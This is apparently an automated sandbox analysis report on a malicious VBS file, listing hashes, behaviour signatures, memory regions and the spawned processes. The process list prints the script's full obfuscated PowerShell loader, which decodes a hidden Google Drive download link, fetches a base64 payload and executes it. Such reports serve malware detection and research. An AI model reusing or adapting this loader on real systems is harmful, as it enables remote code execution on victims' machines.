Analysis

  • max time kernel
    150s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-11-2024 02:18

General

  • Target

    1b32b2a0b09264362731fefb3212dd89d0c5a588e202fe8cb0cc07b0612b06ae.vbs

  • Size

    15KB

  • MD5

    57a98d83eebfd7536413c107b5561bcd

  • SHA1

    ab660a6cdb0bd632e307fb5b69f895df31ef4c67

  • SHA256

    1b32b2a0b09264362731fefb3212dd89d0c5a588e202fe8cb0cc07b0612b06ae

  • SHA512

    9c985a943bcd416e290374c29619dfd7011450f8d469b3d899de2235a2dd79d2b1eb5d845ea199ecd95f5349f2fec137aab02bc46697f778a8ee95376ce80608

  • SSDEEP

    384:YwAAp2YC86mHC6GpbW+lqPIjijLUgZSPDctjjPhnwLCeFFBDq43UVcm9:YopU6OqPy6LUgaGvlwLZFFBD/3UqY

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1b32b2a0b09264362731fefb3212dd89d0c5a588e202fe8cb0cc07b0612b06ae.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Geochemically Ejerlst Attributnavns Fortrende Feminality Hereticas #><#Afluringernes Pestbyld Panpipes #>$Thongy='Forraadnelsernes';function Counterreforms($Kubikindholds){If ($host.DebuggerEnabled) {$Elefantordnerne=4} for ($Pseudosymmetrical123=$Elefantordnerne;;$Pseudosymmetrical123+=5){if(!$Kubikindholds[$Pseudosymmetrical123]) { break }$Skydeskive+=$Kubikindholds[$Pseudosymmetrical123]}$Skydeskive}function Natbordets($Dokhavns){ .($Gallinule) ($Dokhavns)}$Akademiserings=Counterreforms 'VincnLoynEA peTPeri.SlaawVensehomob KntC Ulfl.yclIVitrECultNReplt';$Officialese=Counterreforms 'R toMBut oCl nzFulliadd,lBiffl We aPe,p/';$Buttes=Counterreforms 'bestT betlA grs fug1 nke2';$Logaritmen='Pogr[Ma dnKomtespriTMeth.S enSLusceVicurIn,ovFinniFil,CIbr e,ejiPForhO raiPiroNGranT PorMSikkALsean OptA BosGP rieCephRYuru]Dobb:Icon:Re tSVexae UdecMarkUFeltR Un iVatttUpbuY duppTintRSpo OAfskt edsoHo.pcThr,oportL,arz=Stri$ remBCentulagetUdarT SkeeMakrS';$Officialese+=Counterreforms 'Coun5Fis..Alky0Flex Omfo( DisWLeuciIncanMermdOveroBredwPrefsMont AlchNYderTUnp Fjer1Carr0 P i.Cine0phot; san CentWUvgeiShepnSvin6Beza4o ea;Sade Me.txBuks6Kru 4Hind;Holo dlr FodvE ke: Swa1Tran3 hyl1 rak.Affa0Indb)D.co IdriGHarce Pr cConvk L,goKr k/ Ind2Nv e0F mi1Sc l0Unwi0 ho1 War0Birt1Hand BydeFSynciSys,r udeeUp.lf LeaoSt.mxYear/G.ns1Real3unbu1Depo.Merc0';$Outlearning=Counterreforms 'MidtU oarsAccleh verTrag- EndA W.aGEleceSpadNRebet';$Foreskriver=Counterreforms 'FilihKom tAngrt Qu p UnasChom:Telo/Lim /AfsvdSolbrbeliiSma v T ye Per. ieg Eduo Ga.ojerngOve lSupeeGraf. StjcCo,noSnkemUltr/EneruKa ec Str? MuleFastxFr lp Retostifr lkytMil,=krybdSgetoKanawStrinIndsl jefoSinga svadAuto&TrvaiI otd R d=S ag1NatraNedfAmuseZVoteB rafNOust5Snob- BukV Regw Se,xRatoq ,toxUgudsEmanSNynauFaneP SupBMathMEnchX Bar2Uns,8TricVFod.RBe.muUnusbOve UT ebnZeeiH UdvxHemo8Desao KluJ';$Kodelaasene231=Counterreforms 'Nonc>';$Gallinule=Counterreforms 'PhasIT,roeManeX';$Ransackers='Standardprogrammers';$Artolater='\Ostentation.Non';Natbordets (Counterreforms 'Pig $SkriG VenladopO Sh BDereALa.elFluo: HypPResuO Le,s etetpeireKejsx Sadi Jens GottAmerESaloNDeteTW bf=Euch$CoxoEciern fl v sam:HenvaMnempByg PChokDA riAgaudt AspAKany+fo a$ Beta.ubrrFedntR,gaoI.dsl C aASport SupEKurtr');Natbordets (Counterreforms ' I r$OptlG uneLT,peOO erbO.hyATo vlCh r:Acrik edkRBrani CrugAm.tsA meKPropa GromOverMOblae arbR Para HlotT.ni=,nvi$ C mF psOhygerReb.eforhsDystK ampr AfsIOuttV.ygre,verRBes.. katS injPColllGnawISa.mTtrae(N,en$M trkAfstoMispdSickEChemlBageA Beea,alks .fsE.hotnGrsre ste2Enek3 Rev1Fera)');Natbordets (Counterreforms $Logaritmen);$Foreskriver=$Krigskammerat[0];$Storico123=(Counterreforms 'Gesc$DentgDobbl R mo Spab Hena BefLFi,k:PindE tamPSofahKiesO PacdChorsquoa=G,apn fluEBaciw Kni-Fr bO fskbGobbjbetjEOxy c MesTsai PrepS GeryUngrsPoettAdene OvemDyna.Forb$Curtasuc KOptaA EksdKryde ,amMMikri DaiSHndtEErhvRRundIBrusNCoungMoloS');Natbordets ($Storico123);Natbordets (Counterreforms 'Till$BamaEOpsppAghohTtheoprocdJa rsPeda. ArgH LabePutraRevedMetreFontr BetsU or[Fist$ ,gnO MaruTramtElmal Neke AutaPe srDaarn Syni cann D mgD.bg]Cyc,=Shiv$.aceO Spif.odtfSciliOutscHeliiOpiuaUddilHalveModvsBi.ne');$Pulmotrachearia=Counterreforms 'Trow$CycaEartipR,nshLigno WoodUnf,sConq. anlDT pso Spiw Deln NedlStovoJyllaJackd TrkFForjiEnd lAfs eB,nt(Fear$Sla,FD nkoFor rdi fePilisSkonkJodtrAnvei.elpvGodkeNonsrConv,pret$S,ciBInsilOrniaC,afk SugkMokkeNondd Adee omosFall)';$Blakkedes=$Postexistent;Natbordets (Counterreforms 'Bila$HitcgConjLMinuo isB AkkAKombLskat:S,atpS.igrBortUAldeN enEFlatRb,urs Svo=Opht(mas tOvereOeveSRelitFred-WrigP,nhaaKonstJingh Pro Rum$Camub BunlZe,mAEmbekTel.K satE smadDanseDrabsmyth)');while (!$Pruners) {Natbordets (Counterreforms 'T nd$Necrg analSperoNotabNikkaFo,slm rk:AggrRUneqeSu ecHeteoUme uStenpBri s vi = kum$rengvi daoShipmTrebipseutS lgo') ;Natbordets $Pulmotrachearia;Natbordets (Counterreforms 'Ideos wr,t NarA WesRBio.TUdga- DepSCha,L Bu,eEremeBeziPSy f ,ilf4');Natbordets (Counterreforms ' Ove$K ltGre.tLAntaO,appbundeAMilil Liv: AmapSkrar H.rUKre nSkidEoverrJoshs V d=O.rr(KoortStanESorts oveTSkat-ProcPEcteAPoneTVarmHFjol Par$civibTjenLMisraChauKForskSkvaEIncuDV cteMar,SExu )') ;Natbordets (Counterreforms 'Fisk$Ti kGSkruL aboOG,ribCochAF jtLPh l:BasuiTeenn.yudDUforbConfYTaktg BadGFoxeEStauRGlateFrgnnGr es For=Hers$ vivg AfllMycoO devbA,tiALuftLThyr:quinA.einPgodbpRetieFondLStafSTaloiRe.uNEnhuB T,mlTentOSkatmCrissVoveTGhauECapirLacu+ ru+Hunn%Tang$PreckP.larSkudI Dr,gEnteS Spok Br.Ano rmAn oML nse T lrUndeAEnchtPleo.Selec BaroSympuMarcnSmaat') ;$Foreskriver=$Krigskammerat[$Indbyggerens]}$Brilleslangers=325720;$Sensitometrically=31471;Natbordets (Counterreforms 'Kl d$H,angInteLT,llO o,yb emoAUr ilGloc:PersQImpruPhreEkaprrVandiI leLBil LAalbae sp Aand= ryk ExingVildeIjolTFauv-BlaccNa oOSupenSyttt ShaETan NKanoTdr,p Tyvs$I flBraveL IndA RetkBolik Bl ededid IndeDabcS');Natbordets (Counterreforms 'Data$FamigInstlEuchoRettb iladepulHack: Ti,PFormhPityyRotolL gelVesio UnssD,imt P soSnacm C niMon,nAr baVisceGl.n2Udta6Krig Phth=fea, Fr [SammSUtnkyUdbrs StatHegneKn lmFidu. olfCF okoInfrnGenevQu neVentrRepat ta]Orme: ulm:DishFE nerInc,o PremdishB,raga klis useSpec6Breb4Wam S,rokt orsrJestiPrean,ekygsans(Arve$JoguQ enuIn.leRadirCroqiC,rdl urilDro aM xe)');Natbordets (Counterreforms 'Fald$O eyg Un LKystO pirB Pura.ommL,and: MulUMolenLe sfCasta,ensv CroOUltrU C nr sh IUnd,nKoorg lie Medh=n ph Opda[Pre,s etrYEo.uSnsvitHy.eE idemblik.n opT ,smeBondXPercTJon..Dob.eR,laNvinkCBib O,egedLoesi Me NHumogFall]M ga:Inde: ugAEle,sDmmeC Pe.i BigiUnc,. .erGBlinESesqtUnmeS Ex tTetrR G.iI rotNU bogBran(samm$FornpPsycHTeokyLynbl visLsstnOA.tis,etht nnOZippm Deti ,ugnHandA Came Bro2Stet6omby)');Natbordets (Counterreforms 'Malp$DeklG onoL Op oTor.b ,liaCa,tlA ad:Sno FMicrLFdreuFireGP titNonaSPro,KGallYSpaldCaudn FinIBrann LetgChroSRevebOni AEp,cnha,de A tR Hy NPer.eLys,= Ant$L ukuTretnUlstF BroaStorvPaciOS edu ilorDr.fi Fa nClasgHyge.GaluSUhanUAdvebuv.dSCatit rotR RedIPirrNSa,rG Und( Udk$ F uBFlygrWastiRet LVitilVittELouksL.niLTotoACostNNa rg xtreSpjtrPapis Dem,Kont$VaassFluieDimiNSandS subIDiffT teOT ksmTautev ejT HadrKod.IMau,CjemaAElevLCo wL GeyyCinq)');Natbordets $Flugtskydningsbanerne;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2968

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabB27F.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • memory/2968-20-0x000007FEF621E000-0x000007FEF621F000-memory.dmp

    Filesize

    4KB

  • memory/2968-21-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

    Filesize

    2.9MB

  • memory/2968-23-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-24-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-22-0x0000000002A60000-0x0000000002A68000-memory.dmp

    Filesize

    32KB

  • memory/2968-25-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-26-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-27-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-28-0x000007FEF621E000-0x000007FEF621F000-memory.dmp

    Filesize

    4KB

  • memory/2968-29-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-30-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-31-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-32-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-33-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB